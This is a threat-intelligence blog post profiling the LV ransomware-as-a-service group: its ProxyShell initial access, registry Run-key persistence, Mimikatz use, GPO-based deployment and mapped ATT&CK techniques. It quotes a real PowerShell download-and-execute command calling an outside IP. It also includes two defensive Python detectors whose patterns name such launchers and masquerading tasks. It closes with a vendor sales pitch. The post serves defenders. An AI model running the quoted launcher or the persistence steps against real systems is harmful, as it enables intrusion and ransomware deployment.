Ransomware-as-a-Service (RaaS) is one of the top ransomware trends observed in recent years. Some ransomware groups, such as Conti, LockBit, and BlackCat rent or sell their malicious payloads to other threat groups. Following this popular trend, the LV ransomware group operates as a RaaS provider and targets organizations in the US, Canada, Saudi Arabia, and many European countries. In their latest ransomware attack, the LV ransomware group hit a Jordan-based company [1].
Picus Threat Library includes attack simulations for different LV ransomware variants, and Picus Labs advises organizations to assess their security posture against the adversary techniques used by the LV ransomware group. In this blog, we explain how the LV ransomware group operates and which adversary techniques it uses.
LV Ransomware Group
LV group is a Ransomware-as-a-Service group that has been active since late 2020. Their ransomware payloads are reportedly based on another infamous ransomware group called REvil (aka Sodinokibi). However, the nature of the relationship between LV and REvil is not clear. The research suggests that the LV group either bought or stole the source code from the REvil group and then modified it for their ransomware operations [2].
In addition to RaaS operations, the LV ransomware group also uses initial access brokers (IABs) and buys their way into organizations. LV ransomware group mainly targets manufacturing, retail, and technology organizations in Europe, North America, and Asia. For example, they attacked Germany-based multinational semiconductor manufacturer SEMIKRON in August 2022, and threat actors claimed to steal 2TB worth of documents [3].
How Does the LV Ransomware Group Operate?
As an initial access technique, the LV ransomware group drops a web shell into public access folders by abusing ProxyShell vulnerabilities in Microsoft Exchange servers. After gaining initial access, threat actors establish persistence by modifying registry keys that execute a malicious PowerShell script whenever a user logs on. The PowerShell script installs a backdoor in the victim's environment.
Figure 1: LV ransomware persistence mechanism [1]
Afterward, the group uses netscan and Advanced Port Scanner for network discovery and Mimikatz for credential dumping. Logs collected from compromised servers indicate that threat actors were able to log in via compromised user accounts multiple times. The LV ransomware group used the domain administrator account to move laterally via RDP and infect other assets in the victim's network.
In the final step, attackers create a custom Group Policy Object and set a scheduled task that runs the batch files named 'install.bat' and '1.bat' to deploy the ransomware to all computers that were connected to the domain controller.
Figure 2: The XML file to schedule tasks in the DC group policies folder [1]
Once the sensitive files are encrypted, threat actors delete their malicious artifacts and drop a ransom note on machines.
Figure 3: A ransom note sample by LV Ransomware [4]
TTPs Used by LV Ransomware Group
LV ransomware group uses the following tactics, techniques, and procedures (TTPs) in the MITRE ATT&CK framework:
Tactic: Initial Access
- T1190 Exploit Public-Facing Application
LV group exploits ProxyShell and ProxyLogon vulnerabilities in MS Exchange servers to gain initial access.
Vulnerability | CVE Number | CVSS Score
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-34473 | 9.8 Critical
Microsoft Exchange Server Elevation of Privilege Vulnerability | CVE-2021-34523 | 9.8 Critical
Microsoft Exchange Server Security Feature Bypass Vulnerability | CVE-2021-31207 | 7.2 High
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-26855 | 9.8 Critical
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-27065 | 7.8 High
Tactic: Execution
- T1059.001 Command and Scripting Interpreter: PowerShell
LV group uses PowerShell for several purposes, such as downloading other malicious files. For example:
powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File "IEX ((new-object net.webclient).downloadstring('http://185.82.219.201/sss'))"
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
LV group executes .bat files for purposes such as deploying ransomware on target machines and disabling their security mechanisms.
Figure 4: Contents of 'install.bat' file to disable security services [1]
Figure 5: Contents of '1.bat' file [1]
Tactic: Persistence
- T1078.002 Valid Accounts: Domain Accounts
LV group establishes persistence by using compromised user accounts in the Active Directory.
- T1505.003 Server Software Component: Web Shell
LV group deploys a web shell to compromised computers as a gateway into the victim's network.
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
LV group modifies the registry keys below to execute a malicious PowerShell script whenever a user logs in:
HKU\.Default\Software\Microsoft\Windows\CurrentVersion\Run
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
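One way to catch this persistence mechanism in endpoint telemetry, as an added example that is not part of the original post: the script below parses constructed Sysmon-style Event ID 13 (registry value set) records and flags Run-key writes that start PowerShell with the traits of the launcher shown above (hidden window, execution policy bypass, IEX, DownloadString), treating writes under the SYSTEM hives HKU\.DEFAULT and HKU\S-1-5-18 as high-confidence. The tab-separated record format, the host paths and the placeholder URL are assumptions made for the example.

```python
import re

# Constructed Sysmon-style Event ID 13 (RegistryEvent: Value Set) records, not real telemetry.
# Each record is tab-separated key=value pairs; the URL is a placeholder, not the real one.
SAMPLE_EVENTS = [
    "EventID=13\tTargetObject=HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc"
    "\tDetails=powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File "
    "\"IEX ((new-object net.webclient).downloadstring('http://placeholder.invalid/sss'))\"",
    "EventID=13\tTargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive"
    "\tDetails=C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background",
    "EventID=13\tTargetObject=HKLM\\System\\CurrentControlSet\\Services\\Spooler\\Start\tDetails=DWORD (0x00000002)",
]

# Run/RunOnce values execute at logon; the .DEFAULT and S-1-5-18 hives belong to SYSTEM,
# so a PowerShell launcher written there is the persistence pattern described in the post.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
SYSTEM_HIVE = re.compile(r"^HKU\\(\.DEFAULT|S-1-5-18)\\", re.I)
# Command-line traits of a download-and-execute launcher; each match is one reason to flag.
PS_TRAITS = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(p|xecutionpolicy)?\s+bypass", re.I),
    "Invoke-Expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "web download": re.compile(r"download(string|file)\s*\(", re.I),
    "encoded command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def parse_event(line):
    """Split one tab-separated key=value record into a dict."""
    return dict(field.split("=", 1) for field in line.split("\t"))

def powershell_traits(details):
    """Return the launcher traits present in a registry value's data (empty if not PowerShell)."""
    if not re.search(r"powershell|pwsh", details, re.I):
        return []
    return [name for name, rx in PS_TRAITS.items() if rx.search(details)]

def flag_run_key_events(lines):
    """Flag Run-key writes that start PowerShell from a SYSTEM hive or show two or more traits."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13" or not RUN_KEY.search(ev.get("TargetObject", "")):
            continue
        traits = powershell_traits(ev.get("Details", ""))
        in_system_hive = bool(SYSTEM_HIVE.match(ev["TargetObject"]))
        if (in_system_hive and traits) or len(traits) >= 2:
            findings.append({"key": ev["TargetObject"], "system_hive": in_system_hive, "traits": traits})
    return findings
```

The OneDrive record shows why the rule keys on PowerShell traits rather than on Run-key writes alone: per-user Run values are written by legitimate software all the time.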
Tactic: Privilege Escalation
- T1078.002 Valid Accounts: Domain Accounts
LV group gains domain admin privileges via the compromised credentials for the domain administrator account.
Tactic: Defense Evasion
- T1036.004 Masquerading: Masquerade Task or Service
LV ransomware names its malicious scheduled task 'GoogleUpdateUX' to make it appear legitimate.
- T1027.002 Obfuscated Files or Information: Software Packing
LV group stores the ransomware binary in RC4-encrypted form within a section named 'enc' in order to avoid signature-based detection.
- T1484.001 Domain Policy Modification: Group Policy Modification
LV group creates a malicious Group Policy Object that schedules the tasks for deploying their malware to bypass execution policies.
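The GPO-driven scheduled task behind T1036.004 and T1484.001 above can be audited straight from the preferences XML replicated in SYSVOL. As an added example, not code from the original post or from the Trend Micro report, the script below parses a constructed ScheduledTasks.xml, modelled loosely on the Group Policy Preferences layout, and flags tasks whose name imitates a vendor updater but whose action runs cmd.exe against batch files. The task contents, host and domain names, script paths and the vendor allowlist are all assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed ScheduledTasks.xml, modelled loosely on the Group Policy Preferences layout
# (SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml).
# Host, domain and script paths are invented; clsid and timestamp attributes are omitted.
SAMPLE_XML = r"""<ScheduledTasks>
  <TaskV2 name="GoogleUpdateUX">
    <Properties action="C" name="GoogleUpdateUX" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author">
        <Exec><Command>cmd.exe</Command><Arguments>/c \\dc01\SYSVOL\corp.example\scripts\install.bat</Arguments></Exec>
        <Exec><Command>cmd.exe</Command><Arguments>/c \\dc01\SYSVOL\corp.example\scripts\1.bat</Arguments></Exec>
      </Actions></Task></Properties>
  </TaskV2>
  <TaskV2 name="GoogleUpdateTaskMachineCore">
    <Properties action="C" name="GoogleUpdateTaskMachineCore" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author">
        <Exec><Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command><Arguments>/c</Arguments></Exec>
      </Actions></Task></Properties>
  </TaskV2>
</ScheduledTasks>"""

# Interpreters that a legitimate vendor updater task has no reason to launch directly.
SCRIPT_HOST = re.compile(r"(^|\\)(cmd|powershell|pwsh|wscript|cscript|mshta)(\.exe)?$", re.I)
SCRIPT_FILE = re.compile(r"\.(bat|cmd|ps1|vbs|js|hta)\b", re.I)
# Constructed allowlist: a task whose name contains the key must run the matching binary.
VENDOR_BINARIES = {
    "googleupdate": re.compile(r"\\Google\\Update\\GoogleUpdate\.exe$", re.I),
}

def audit_gpp_tasks(xml_text):
    """Return one finding per suspicious TaskV2 entry, with the reasons it was flagged."""
    findings = []
    for task in ET.fromstring(xml_text).iter("TaskV2"):
        name = task.get("name", "")
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        actions = [((e.findtext("Command") or "").strip(), e.findtext("Arguments") or "")
                   for e in task.iter("Exec")]
        reasons = []
        for cmd, args in actions:
            if SCRIPT_HOST.search(cmd) or SCRIPT_FILE.search(args):
                reasons.append(f"script execution: {cmd} {args}".strip())
        for key, binary in VENDOR_BINARIES.items():
            if key in name.lower() and not all(binary.search(cmd) for cmd, _ in actions):
                reasons.append(f"name mimics {key} but the action is not the vendor binary")
        if reasons:
            findings.append({"task": name, "run_as": run_as, "reasons": reasons})
    return findings
```

Running the audit on every GPO under SYSVOL and diffing the results against the previous run turns a newly pushed GPO into a concrete alert, which is what a domain-wide deployment like the one described in the post looks like from the defender's side.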
- T1562.001 Impair Defenses: Disable or Modify Tools
LV group executes the 'install.bat' file on target computers in order to disable security services.
- T1070.004 Indicator Removal: File Deletion
LV group deleted their artifacts from the victim's network after encrypting files to minimize their footprint and avoid forensic analysis.
Tactic: Credential Access
- T1003.001 OS Credential Dumping
LV group uses Mimikatz to dump account credentials.
Tactic: Discovery
- T1083 Network Service Discovery
LV group uses tools such as Netscan and Advanced Port Scanner to discover services in the network.
Tactic: Lateral Movement
- T1021.001 Remote Services: Remote Desktop Protocol
LV group moves laterally to other hosts in the victim's network via RDP and the compromised domain admin credentials.
Tactic: Command and Control
- T1105 Ingress Tool Transfer
LV group downloads the third-party tools it needs into the compromised network via built-in PowerShell utilities such as IEX and (New-Object Net.WebClient).DownloadString().
Tactic: Impact
- T1486 Data Encrypted for Impact
LV ransomware encrypts victims' files and appends extensions such as 'l7dm4566n' to them.
How Does Picus Help Simulate LV Ransomware Attacks?
We also strongly suggest simulating LV ransomware attacks with the Picus Complete Security Validation Platform to test the effectiveness of your security controls against ransomware. You can test your defenses against LV ransomware and hundreds of other ransomware families such as REvil, BlackCat, and LockBit within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for LV ransomware:
Threat ID | Action Name | Attack Module
68128 | LV Ransomware Email Threat | Email Infiltration (Phishing)
91612 | LV Ransomware Download Threat | Network Infiltration
Indicators of Compromise
References
[1] "LV Ransomware Exploits ProxyShell in Attack on a Jordan-based Company," Trend Micro, Oct. 25, 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html. [Accessed: Oct. 27, 2022]
[2] "GOLD NORTHFIELD," Secureworks. [Online]. Available: http://www.secureworks.com/research/threat-profiles/gold-northfield. [Accessed: Oct. 27, 2022]
[3] S. Gatlan, "Semiconductor manufacturer Semikron hit by LV ransomware attack," BleepingComputer, Aug. 02, 2022. [Online]. Available: https://www.bleepingcomputer.com/news/security/semiconductor-manufacturer-semikron-hit-by-lv-ransomware-attack/. [Accessed: Oct. 27, 2022]
[4] "LV Ransomware," Secureworks, Jun. 22, 2021. [Online]. Available: https://www.secureworks.com/research/lv-ransomware. [Accessed: Oct. 27, 2022]